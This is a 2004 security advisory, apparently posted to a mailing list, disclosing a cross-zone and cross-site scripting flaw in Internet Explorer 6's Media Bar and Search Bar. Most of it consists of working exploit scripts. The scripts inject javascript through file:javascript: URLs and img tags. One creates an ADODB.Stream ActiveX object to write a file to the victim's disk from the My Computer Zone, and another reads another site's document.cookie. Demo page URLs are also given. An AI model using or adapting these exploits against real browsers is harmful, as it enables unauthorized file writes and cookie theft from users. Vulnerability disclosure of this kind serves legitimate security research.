<<< Date Index >>>     <<< Thread Index >>>

New Internet Explorer Cross Zone/Site Scripting Vulnerability





#########################################################################

Advisory Name : Internet Explorer Cross Zone/Site Scripting Vulnerability
 Release Date : Mar 3,2004 
  Application : Microsoft Internet Explorer
    Tested On : MS-IE 6.0(sp1)
   Vendor URL : http://www.microsoft.com/ie
       Author : Cheng Peng Su(apple_soup_at_msn.com)

#########################################################################


[Proof of Concept]
   The code below is used for loading a URL into the HTML content area of the 
Media Bar
   window.open("http://www.google.com/","_media";)
   And javascript also can be injected:
   window.open("javascript:alert(location.href)","_media")
   in my computer,the code above will show me a MsgBox says 
        'res://C:\WINDOWS\SYSTEM\BROWSELC.DLL/mbLoading.htm'
   it suggests you that it's executed in My Computer Zone.
   We can also inject a code to the Media Bar which has connected to a website.
   As Media Bar ,Search Bar has the same vuln.
   
[Exploit]
   !YOU CAN FIND THE DOCUMENT AT
   !http://www.freewebs.com/applesoup/CrossBar/document.txt
  
   The code will use 'file:javascript:[script]' vuln which posted months 
ago.Maybe Microsoft
   has noticed the leak here,so i can't only use javascript-protocol in the 
code, and  script-tag
   is filtered out ,so i have to inject the script into img-tag.
   
   I. In Media Bar
   1 . Cross Zone Scripting Exploit
   ---------------------------CrossZone.htm---------------------------
   &lt;script&gt;
   
   // '\\42' -> '\42' -> ' " '
   img_src='javascript:file = \\42Exploit.txt\\42; o = new 
ActiveXObject(\\42ADODB.Stream\\42);'
   + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is 
Cheng Peng Su.\\42);'
   + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create 
\\42+file+\\42 on your desktop!\\42);';

   inject_html="<img src='" + img_src + "'>";
   
   window.open('file:javascript:document.write("' + inject_html + 
'")','_media');

   &lt;/script&gt;
   -------------------------------End---------------------------------
   
   
   2 . Cross Site Scripting Exploit
   ---------------------------CrossSite.htm---------------------------
   &lt;script&gt;

   window.open("http://www.google.com/","_media";)
   setTimeout(function(){
   window.open("file:javascript:alert(document.cookie);","_media")
   },5000);
   
   &lt;/script&gt;
   -------------------------------End---------------------------------
   
   
   
   
   II. In Search Bar
   1 . Cross Zone Scripting Exploit
   ---------------------------CrossZone.htm---------------------------
   &lt;script&gt;
   window.open("http://wrong_site_add/","_search";) //To load "Friendly HTTP 
error messages" page
                                                   // cause it's in My Computer 
Zone.
   setTimeout(function(){
   
      // '\\42' -> '\42' -> ' " '
      img_src='javascript:file = \\42Exploit.txt\\42; o = new 
ActiveXObject(\\42ADODB.Stream\\42);'
      + ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name 
is Cheng Peng Su.\\42);'
      + ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create 
\\42+file+\\42 on your desktop!\\42);';

      inject_html="<img src='" + img_src + "'>";
   
      window.open('file:javascript:document.write("' + inject_html + 
'")','_search');

   },5000);
   
   &lt;/script&gt;
   -------------------------------End---------------------------------
      
   
   2 . Cross Site Scripting Exploit
   ---------------------------CrossSite.htm---------------------------
   &lt;script&gt;

   window.open("http://www.google.com/","_search";)
   setTimeout(function(){
   window.open("file:javascript:alert(document.cookie);","_search")
   },5000);
   
   &lt;/script&gt;
   -------------------------------End---------------------------------

[Demo]
   Harmless demo:
   http://www.freewebs.com/applesoup/CrossBar/CrossSiteMB.htm
   http://www.freewebs.com/applesoup/CrossBar/CrossZoneMB.htm
   http://www.freewebs.com/applesoup/CrossBar/CrossSiteSB.htm
   http://www.freewebs.com/applesoup/CrossBar/CrossZoneSB.htm
   
[Contact]
Cheng Peng Su
Class 1,Senior 2,high school attached to Wuhan University
Wuhan,Hubei,China(430072)
apple_soup_at_msn.com